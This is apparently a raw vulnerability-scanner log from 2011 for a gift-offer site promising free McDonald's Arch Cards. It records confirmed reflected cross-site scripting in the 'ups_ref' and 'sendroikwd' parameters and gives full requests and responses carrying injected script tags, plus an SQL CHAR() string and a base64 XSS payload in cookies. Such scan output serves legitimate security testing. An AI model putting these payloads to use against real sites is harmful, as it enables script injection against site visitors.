<TD COLSPAN=2><font face="Arial, Helvetica, sans-serif" size=2><B>Congratulations!</B> To qualify for your FREE $250 in McDonald's&reg; Arch Cards&trade; start by fully completing any <U><B>2</B></U> of the sponsor offers listed below on this page! It's fast and easy!<P><B>How can we offer this $250 in McDonald's&reg; Arch Cards&trade; for free?</B> - Our sponsors cover the costs of the $250 in McDonald's&reg; Arch Cards&trade; along with the shipping and handling charges. To claim your $250 in McDonald's&reg; Arch Cards&trade; simply complete the offers as instructed. Once you fulfill the participation requirements, we will ship the incentive gift to you with free shipping.<P>Prior to us shipping the $250 in McDonald's&reg; Arch Cards&trade;, you will have the opportunity to re-confirm your shipping address to ensure speedy delivery.</FONT></TD>
</TR>
</TABLE></TD>
</TR>
</TABLE>
<CENTER><FONT COLOR=#FF0000 FACE="Verdana,sans-serif" SIZE=4><B>TOP OFFERS PAGE 1 of 3 - Silver Offers</B></FONT><P><FONT COLOR=#000000 FACE="Verdana,sans-serif" SIZE=3><B>Begin by completing any 2 Silver offers below</B>!</FONT></CENTER><table width="95%" border="0" cellspacing="0" cellpadding="5" align="center"></table> </TD>
</TR>
<TR>
<TD COLSPAN=4>&nbsp;</TD>
</TR>
</TABLE>
<BR>
<BR>
<CENTER><TABLE WIDTH=640><TR><TD ALIGN=center><FONT FACE=verdana,sans-serif SIZE=+1><B><A HREF="/ups.htm?path=p.prize.prepop-reg-int-ic_3group_group1&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x000084)</script>&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;">After You've Completed 2 Silver Offers above, Go To Next Page</FONT></A></B></TD></TR></TABLE></CENTER> <BR>
<BR></TD>
</TR>
</TABLE>
<BR>
<BR>
<BR>
<CENTER>
<TABLE WIDTH=720 BORDER=0>
<TR>
<TD><FONT FACE="verdana,sans-serif" SIZE=1 COLOR=#666666>

<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<!--BeginField:Disclaimer-->You must complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and satisfy all <A HREF="info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</A> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <A HREF="info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<p></p>
To complete credit card offers you must activate your card by making a purchase, transferring a balance, or making cash advance; you must have the product installed for satellite tv offers.
<p></p>
Your-gift-zone�s Gift Program is not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.<!--EndField:Disclaimer-->

<p align="center">
<!--BeginField:Links-->
<A HREF="redeem.htm?promo_name=2192name&gift=29617&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('redeem.htm?promo_name=2192name&gift=29617&catalog_id=13200','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Check Gift Status</A> - <A HREF="info.htm?tp=faq&promo_name=2192name&gift=29617&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('info.htm?tp=faq&promo_name=2192name&gift=29617&catalog_id=13200','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;"> Help</A> - <A HREF="info.htm?tp=privacy&promo_name=2192name&gift=29617&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('info.htm?tp=privacy&promo_name=2192name&gift=29617&catalog_id=13200','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="suppress.htm?user_ref_id=90563525&promo_name=2192name&gift=29617&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('suppress.htm?user_ref_id=90563525&promo_name=2192name&gift=29617&catalog_id=13200','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/cs/?promo_name=&gift=&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/cs/?promo_name=&gift=&catalog_id=13200','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A>
<!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2010 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->
</CENTER></TD>
</TR>
</TABLE>
</BODY>
</HTML>
- /ups.htm

/ups.htm CONFIRMED

http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=296..

Parameters

Parameter Type Value
user_pin_id GET 200492244
pin_key GET 706853
user_ref_id GET 90563525
gift GET 29617
user_gift_id GET 332549389
path GET p.prize.prepop-reg-int
page_tmp_id GET 9
promotion_id GET 2192
promo_name GET 2192name
catalog_id GET 13200
tmp_sequence GET 6924-11079-6839-10131-6166-10237-10231-10284-10233-10292
page_tmp GET 3
ups_ref GET '"--></style></script><script>alert(0x000096)</script>
sendroikwd GET 3
raf_ad_id GET 3
remoteRef GET 3_4_0_5068_0
return_url GET 3
short_ic_path GET 3
SID GET f05c7ce946bc38d8bfa6b839a4d56265
page_list GET li_sr_sm

Request

GET /ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=3&ups_ref='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000096)%3C/script%3E&sendroikwd=3&raf_ad_id=3&remoteRef=3_4_0_5068_0&return_url=3&short_ic_path=3&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: promo_name_cookie=2192name; c_user_pin_id=200492244; c_pin_key=706853; c_email_key=063756462f49f8c46ec5bc4e60bb02b1; gift_cookie=29617; promo_cookie=v4|207753-14843-:1303916209; scook=1303916209; k=5113356; v=5113356; (CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMDI5KTwvc2NyaXB0Pg==
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 14:57:05 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db82ec1a8306sql;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Your-gift-zone</title>
<link rel="stylesheet" href="http://i.pcp001.com/t/9533/regpath3_03.css" type="text/css" media="all">
<link rel="stylesheet" href="http://i.pcp001.com/t/9673/red4.css" type="text/css" media="all">
<style>

#ic_link_previous_1 {
display:none
}
.justcenter_1{
text-align: center;
}

.justcenter_2{
float: right;
}

.justcenter_3{
float: right;
}




div.spacer{
height:40px;
*height:60px;
font-size:40px;
*font-size:60px;
}



#details {
display:none;
position:absolute;
background-color:#FFF;
width:300px;
z-index:2;
padding:5px 10px 10px 10px;
border:1px solid #000;
font-size:12px;
color:#000000;
text-align:left;
font-family: Arial, Helvetica, sans-serif;
font-weight:normal;
text-decoration:none;
}

#details a {
color:#0000FF;
}
</style>

<script language="javascript">
function showD(id) {
document.getElementById(id).style.display = "block";
}
function hideD(id) {
document.getElementById(id).style.display = "none";
}
</script>

<SCRIPT>
var x_cmd=1;

function x_win(){
if(x_cmd==1){
x_win=window.open('/ups.htm?path=p.prize.prepop-reg-int&mode=exit&exit_num=&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref='"--></style></script><script>netsparker(0x000096)</script>&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID=f05c7ce946bc38d8bfa6b839a4d56265','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

function changeFontSize()
{
return;
var text = document.getElementById("phrase").innerHTML;
var fontSize = -1.75 * (parseInt(text.length)) + 90;
document.getElementById("phrase").style.fontSize = fontSize + 'px';
return;
}


</SCRIPT>
</head>

<BODY onLoad="changeFontSize();" onUnLoad="x_win();" >
<div id="hdrContentOffers">
<div id="header">
<div id="hdtop">
<table width="750" height="100%"><tr><td class="mainHdr">
Receive Your FREE $250 in McDonald's&reg; Arch Cards&trade;.
</td></tr></table>
</div>






<div id="hdbot">
<div id="stepArea3"><span class="fillout">Congratulations</span></div>
</div>
</div>

<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div id="guest-cardarea">


<table width="790" border="0" cellpadding="8" cellspacing="8">
<tr>
<td width="250">

<span class="gifttitle">$250 in McDonald's&reg; Arch Cards&trade;</span> <br />
<span style="margin-left: 30px;"><img src="http://i.pcp001.com/g/archcard1_165x150.gif" alt=""></span></td>
<td width="370" valign="top">
<div class="spacer15">&nbsp;</div>
<div class="spacer15">&nbsp;</div>
<img src="http://i.pcp001.com/t/9794/shiptitle-box.jpg" width="174" height="29" />
<div style="margin-left: 30px;">
<p></p>
<span class="font11">You will have a chance to confirm<br />
your address prior to shipping.</span>
</div>
</td>

<td width="150" valign="top"><br />
<span class="font11">
Congratulations, ! To qualify for your free $250 in McDonald's&reg; Arch Cards&trade;, start by completing any 2 of the Silver offers listed below!</span>





</td>
</tr>
</table>

</div>
</div>

<!-- Content Begins -->
<div id="content">
<table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">


</table>
<div>


<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" width="40%" valign="top">
<div id="blue_previousbutton1">
<span id="ic_link_previous_1">
<a href="/ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x000096)</script>&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" style="width: 134px; height: 75px;" border="0"></a>
</span>
</div>
</td>
<td align="right" valign="top">
<table width="100%" border="0"><tr><td width=360 NOWRAP><span class="buttontxt" id="buttontxt1" >After You've Completed 2 Offers</span></td><td>
<div id="blue_nextbutton1">
<a href="/ups.htm?path=p.prize.prepop-reg-int-ic_3group_group1&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x000096)</script>&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" border="0" style="width: 207px; height: 88px;"></a>
</div>
</td>
</tr>
</table>




</td>
</tr>
</table>



</div>
<br><br>
<br><br>


<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<p>
<!--BeginField:Disclaimer-->
You are required to complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and must satisfy all <a href="info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</a> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <a href="info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<br/><br/>
For credit card offers, you must activate your card by making a purchase, transferring a balance, or making cash advance; for satellite tv offers you must have the product installed.
<br/><br/>
We are not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.
<!--EndField:Disclaimer-->
</p>
<p align="center">
<!--BeginField:Links--><A HREF="/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Gift Redemption</A> - <A HREF="/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">FAQ</a> - <A HREF="/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A><!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2009 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->





</div>
<!-- Content ENDS -->



</BODY>
</html>



- /ups.htm

/ups.htm CONFIRMED

http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=296..

Parameters

Parameter Type Value
user_pin_id GET 200492244
pin_key GET 706853
user_ref_id GET 90563525
gift GET 29617
user_gift_id GET 332549389
path GET p.prize.prepop-reg-int
page_tmp_id GET 9
promotion_id GET 2192
promo_name GET 2192name
catalog_id GET 13200
tmp_sequence GET 6924-11079-6839-10131-6166-10237-10231-10284-10233-10292
page_tmp GET 3
ups_ref GET cg
sendroikwd GET '"--></style></script><script>alert(0x000097)</script>
raf_ad_id GET 3
remoteRef GET 3_4_0_5068_0
return_url GET 3
short_ic_path GET 3
SID GET f05c7ce946bc38d8bfa6b839a4d56265
page_list GET li_sr_sm

Request

GET /ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=3&ups_ref=cg&sendroikwd='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000097)%3C/script%3E&raf_ad_id=3&remoteRef=3_4_0_5068_0&return_url=3&short_ic_path=3&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: promo_name_cookie=2192name; c_user_pin_id=200492244; c_pin_key=706853; c_email_key=063756462f49f8c46ec5bc4e60bb02b1; gift_cookie=29617; promo_cookie=v4|207753-14843-:1303916209; scook=1303916209; k=5113356; v=5113356; (CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMDI5KTwvc2NyaXB0Pg==
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 14:57:08 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db82ec4db5adk5k;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Your-gift-zone</title>
<link rel="stylesheet" href="http://i.pcp001.com/t/9533/regpath3_03.css" type="text/css" media="all">
<link rel="stylesheet" href="http://i.pcp001.com/t/9673/red4.css" type="text/css" media="all">
<style>

#ic_link_previous_1 {
display:none
}
.justcenter_1{
text-align: center;
}

.justcenter_2{
float: right;
}

.justcenter_3{
float: right;
}




div.spacer{
height:40px;
*height:60px;
font-size:40px;
*font-size:60px;
}



#details {
display:none;
position:absolute;
background-color:#FFF;
width:300px;
z-index:2;
padding:5px 10px 10px 10px;
border:1px solid #000;
font-size:12px;
color:#000000;
text-align:left;
font-family: Arial, Helvetica, sans-serif;
font-weight:normal;
text-decoration:none;
}

#details a {
color:#0000FF;
}
</style>

<script language="javascript">
function showD(id) {
document.getElementById(id).style.display = "block";
}
function hideD(id) {
document.getElementById(id).style.display = "none";
}
</script>

<SCRIPT>
var x_cmd=1;

function x_win(){
if(x_cmd==1){
x_win=window.open('/ups.htm?path=p.prize.prepop-reg-int&mode=exit&exit_num=&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd='"--></style></script><script>netsparker(0x000097)</script>&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID=f05c7ce946bc38d8bfa6b839a4d56265','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

function changeFontSize()
{
return;
var text = document.getElementById("phrase").innerHTML;
var fontSize = -1.75 * (parseInt(text.length)) + 90;
document.getElementById("phrase").style.fontSize = fontSize + 'px';
return;
}


</SCRIPT>
</head>

<BODY onLoad="changeFontSize();" onUnLoad="x_win();" >
<div id="hdrContentOffers">
<div id="header">
<div id="hdtop">
<table width="750" height="100%"><tr><td class="mainHdr">
Receive Your FREE $250 in McDonald's&reg; Arch Cards&trade;.
</td></tr></table>
</div>






<div id="hdbot">
<div id="stepArea3"><span class="fillout">Congratulations</span></div>
</div>
</div>

<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div id="guest-cardarea">


<table width="790" border="0" cellpadding="8" cellspacing="8">
<tr>
<td width="250">

<span class="gifttitle">$250 in McDonald's&reg; Arch Cards&trade;</span> <br />
<span style="margin-left: 30px;"><img src="http://i.pcp001.com/g/archcard1_165x150.gif" alt=""></span></td>
<td width="370" valign="top">
<div class="spacer15">&nbsp;</div>
<div class="spacer15">&nbsp;</div>
<img src="http://i.pcp001.com/t/9794/shiptitle-box.jpg" width="174" height="29" />
<div style="margin-left: 30px;">
<p></p>
<span class="font11">You will have a chance to confirm<br />
your address prior to shipping.</span>
</div>
</td>

<td width="150" valign="top"><br />
<span class="font11">
Congratulations, ! To qualify for your free $250 in McDonald's&reg; Arch Cards&trade;, start by completing any 2 of the Silver offers listed below!</span>





</td>
</tr>
</table>

</div>
</div>

<!-- Content Begins -->
<div id="content">
<table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">


</table>
<div>


<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" width="40%" valign="top">
<div id="blue_previousbutton1">
<span id="ic_link_previous_1">
<a href="/ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x000097)</script>&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" style="width: 134px; height: 75px;" border="0"></a>
</span>
</div>
</td>
<td align="right" valign="top">
<table width="100%" border="0"><tr><td width=360 NOWRAP><span class="buttontxt" id="buttontxt1" >After You've Completed 2 Offers</span></td><td>
<div id="blue_nextbutton1">
<a href="/ups.htm?path=p.prize.prepop-reg-int-ic_3group_group1&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x000097)</script>&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" border="0" style="width: 207px; height: 88px;"></a>
</div>
</td>
</tr>
</table>




</td>
</tr>
</table>



</div>
<br><br>
<br><br>


<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<p>
<!--BeginField:Disclaimer-->
You are required to complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and must satisfy all <a href="info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</a> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <a href="info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<br/><br/>
For credit card offers, you must activate your card by making a purchase, transferring a balance, or making cash advance; for satellite tv offers you must have the product installed.
<br/><br/>
We are not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.
<!--EndField:Disclaimer-->
</p>
<p align="center">
<!--BeginField:Links--><A HREF="/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Gift Redemption</A> - <A HREF="/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">FAQ</a> - <A HREF="/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A><!--EndField:Links-->
